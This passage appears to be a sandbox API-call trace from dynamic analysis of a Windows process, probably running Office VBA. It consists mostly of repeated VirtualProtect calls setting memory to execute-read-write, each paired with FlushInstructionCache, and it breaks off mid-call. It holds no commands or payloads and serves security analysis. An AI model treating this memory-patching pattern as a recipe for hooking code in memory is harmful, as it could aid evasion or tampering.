[0095.535] GetCurrentProcess () returned 0xffffffff [0095.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.535] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.536] GetCurrentProcess () returned 0xffffffff [0095.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.536] GetCurrentProcess () returned 0xffffffff [0095.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.536] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.537] GetCurrentProcess () returned 0xffffffff [0095.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.537] GetCurrentProcess () returned 0xffffffff [0095.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.537] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.537] GetCurrentProcess () returned 0xffffffff [0095.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.537] GetCurrentProcess () returned 0xffffffff [0095.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.537] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.538] GetCurrentProcess () returned 0xffffffff [0095.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.540] GetAsyncKeyState (vKey=3) returned 0 [0095.540] GetAsyncKeyState (vKey=3) returned 0 [0095.546] CRetailMalloc_Alloc () returned 0xf52f248 [0095.546] memcpy (in: _Dst=0xb2a5168, _Src=0x1977bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.546] memcpy (in: _Dst=0xf52f268, _Src=0x197824, _Size=0x18 | out: _Dst=0xf52f268) returned 0xf52f268 [0095.546] CRetailMalloc_Realloc () returned 0xf52f248 [0095.546] CRetailMalloc_Free () returned 0x1 [0095.546] GetCurrentProcess () returned 0xffffffff [0095.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.546] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.547] GetCurrentProcess () returned 0xffffffff [0095.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.547] GetCurrentProcess () returned 0xffffffff [0095.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.547] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.548] GetCurrentProcess () returned 0xffffffff [0095.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.548] GetCurrentProcess () returned 0xffffffff [0095.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.548] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.549] GetCurrentProcess () returned 0xffffffff [0095.549] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.549] GetCurrentProcess () returned 0xffffffff [0095.549] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.549] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.550] GetCurrentProcess () returned 0xffffffff [0095.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.550] GetCurrentProcess () returned 0xffffffff [0095.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.550] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.551] GetCurrentProcess () returned 0xffffffff [0095.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.551] GetCurrentProcess () returned 0xffffffff [0095.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.551] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.552] GetCurrentProcess () returned 0xffffffff [0095.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.552] GetCurrentProcess () returned 0xffffffff [0095.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.552] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.552] GetCurrentProcess () returned 0xffffffff [0095.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.552] GetCurrentProcess () returned 0xffffffff [0095.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.553] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.553] GetCurrentProcess () returned 0xffffffff [0095.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.553] GetCurrentProcess () returned 0xffffffff [0095.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.553] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.554] GetCurrentProcess () returned 0xffffffff [0095.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.554] GetCurrentProcess () returned 0xffffffff [0095.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.554] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.570] GetCurrentProcess () returned 0xffffffff [0095.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.570] GetCurrentProcess () returned 0xffffffff [0095.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.570] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.571] GetCurrentProcess () returned 0xffffffff [0095.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.572] GetCurrentProcess () returned 0xffffffff [0095.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.572] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.572] GetCurrentProcess () returned 0xffffffff [0095.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.573] GetCurrentProcess () returned 0xffffffff [0095.573] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.573] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.573] GetCurrentProcess () returned 0xffffffff [0095.573] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.573] GetCurrentProcess () returned 0xffffffff [0095.574] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.574] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.574] GetCurrentProcess () returned 0xffffffff [0095.574] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.574] GetCurrentProcess () returned 0xffffffff [0095.574] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.574] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.575] GetCurrentProcess () returned 0xffffffff [0095.575] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.575] GetCurrentProcess () returned 0xffffffff [0095.575] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.575] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.576] GetCurrentProcess () returned 0xffffffff [0095.576] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.576] GetCurrentProcess () returned 0xffffffff [0095.576] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.576] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.576] GetCurrentProcess () returned 0xffffffff [0095.576] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.576] GetCurrentProcess () returned 0xffffffff [0095.577] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.577] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.577] GetCurrentProcess () returned 0xffffffff [0095.577] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.577] GetCurrentProcess () returned 0xffffffff [0095.577] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.577] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.578] GetCurrentProcess () returned 0xffffffff [0095.578] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.578] GetCurrentProcess () returned 0xffffffff [0095.578] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.578] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.579] GetCurrentProcess () returned 0xffffffff [0095.579] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.579] GetCurrentProcess () returned 0xffffffff [0095.579] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.580] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.580] GetCurrentProcess () returned 0xffffffff [0095.580] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.580] GetCurrentProcess () returned 0xffffffff [0095.580] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.580] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.581] GetCurrentProcess () returned 0xffffffff [0095.581] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.581] GetCurrentProcess () returned 0xffffffff [0095.581] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.581] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.582] GetCurrentProcess () returned 0xffffffff [0095.582] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.582] GetCurrentProcess () returned 0xffffffff [0095.582] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.582] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.583] GetCurrentProcess () returned 0xffffffff [0095.583] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.583] GetCurrentProcess () returned 0xffffffff [0095.583] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.583] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.584] GetCurrentProcess () returned 0xffffffff [0095.584] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.584] GetCurrentProcess () returned 0xffffffff [0095.584] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.584] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.585] GetCurrentProcess () returned 0xffffffff [0095.585] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.585] GetCurrentProcess () returned 0xffffffff [0095.585] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.585] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.588] GetCurrentProcess () returned 0xffffffff [0095.589] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.589] GetCurrentProcess () returned 0xffffffff [0095.589] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.589] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.589] GetCurrentProcess () returned 0xffffffff [0095.589] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.589] GetCurrentProcess () returned 0xffffffff [0095.589] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.590] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.590] GetCurrentProcess () returned 0xffffffff [0095.590] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.590] GetCurrentProcess () returned 0xffffffff [0095.590] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.590] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.591] GetCurrentProcess () returned 0xffffffff [0095.591] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.591] GetCurrentProcess () returned 0xffffffff [0095.591] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.591] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0095.592] GetCurrentProcess () returned 0xffffffff [0095.592] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.593] GetAsyncKeyState (vKey=3) returned 0 [0095.593] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.593] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.593] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.593] CRetailMalloc_Alloc () returned 0xf52f2a8 [0095.593] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.593] memcpy (in: _Dst=0xf52f2c8, _Src=0x197724, _Size=0x18 | out: _Dst=0xf52f2c8) returned 0xf52f2c8 [0095.593] CRetailMalloc_Realloc () returned 0xf52f2a8 [0095.593] CRetailMalloc_Free () returned 0x1 [0095.593] GetCurrentProcess () returned 0xffffffff [0095.593] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.593] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.594] GetCurrentProcess () returned 0xffffffff [0095.594] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.594] GetCurrentProcess () returned 0xffffffff [0095.594] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.594] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.595] GetCurrentProcess () returned 0xffffffff [0095.595] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.595] GetCurrentProcess () returned 0xffffffff [0095.595] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.595] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.596] GetCurrentProcess () returned 0xffffffff [0095.596] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.596] GetCurrentProcess () returned 0xffffffff [0095.596] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.596] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.596] GetCurrentProcess () returned 0xffffffff [0095.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.597] GetCurrentProcess () returned 0xffffffff [0095.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.597] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.597] GetCurrentProcess () returned 0xffffffff [0095.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.597] GetCurrentProcess () returned 0xffffffff [0095.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.597] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.598] GetCurrentProcess () returned 0xffffffff [0095.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.598] GetCurrentProcess () returned 0xffffffff [0095.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.598] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.599] GetCurrentProcess () returned 0xffffffff [0095.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.599] GetCurrentProcess () returned 0xffffffff [0095.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.599] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.600] GetCurrentProcess () returned 0xffffffff [0095.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.600] GetCurrentProcess () returned 0xffffffff [0095.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.600] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.600] GetCurrentProcess () returned 0xffffffff [0095.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.600] GetCurrentProcess () returned 0xffffffff [0095.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.601] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.601] GetCurrentProcess () returned 0xffffffff [0095.601] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.602] GetCurrentProcess () returned 0xffffffff [0095.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.602] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.602] GetCurrentProcess () returned 0xffffffff [0095.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.602] GetCurrentProcess () returned 0xffffffff [0095.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.602] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.603] GetCurrentProcess () returned 0xffffffff [0095.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.603] GetCurrentProcess () returned 0xffffffff [0095.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.603] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.604] GetCurrentProcess () returned 0xffffffff [0095.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.604] GetCurrentProcess () returned 0xffffffff [0095.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.604] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.605] GetCurrentProcess () returned 0xffffffff [0095.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.605] GetCurrentProcess () returned 0xffffffff [0095.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.605] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.605] GetCurrentProcess () returned 0xffffffff [0095.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.605] GetCurrentProcess () returned 0xffffffff [0095.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.606] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.606] GetCurrentProcess () returned 0xffffffff [0095.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.606] GetCurrentProcess () returned 0xffffffff [0095.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.606] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.607] GetCurrentProcess () returned 0xffffffff [0095.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.607] GetCurrentProcess () returned 0xffffffff [0095.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.607] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.608] GetCurrentProcess () returned 0xffffffff [0095.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.608] GetCurrentProcess () returned 0xffffffff [0095.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.608] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.609] GetCurrentProcess () returned 0xffffffff [0095.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.609] GetCurrentProcess () returned 0xffffffff [0095.609] FlushInstructionCache (hProcess=0xffffffff, 